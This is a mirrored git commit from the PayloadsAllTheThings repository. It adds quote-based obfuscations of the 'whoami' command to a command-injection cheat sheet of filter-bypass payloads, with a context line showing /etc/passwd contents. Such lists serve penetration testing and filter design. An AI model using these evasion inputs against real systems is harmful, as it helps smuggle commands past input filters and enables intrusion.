mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
update quote evasion payloads
This commit is contained in:
parent
80707e805b
commit
77f83c18b3
@ -266,6 +266,7 @@ root:x:0:0:root:/root:/bin/bash
|
||||
```powershell
|
||||
w'h'o'am'i
|
||||
wh''oami
|
||||
'w'hoami
|
||||
```
|
||||
|
||||
#### Bypass with double quote
|
||||
@ -273,6 +274,7 @@ wh''oami
|
||||
```powershell
|
||||
w"h"o"am"i
|
||||
wh""oami
|
||||
"wh"oami
|
||||
```
|
||||
|
||||
#### Bypass with backticks
|
||||
|
Loading…
Reference in New Issue
Block a user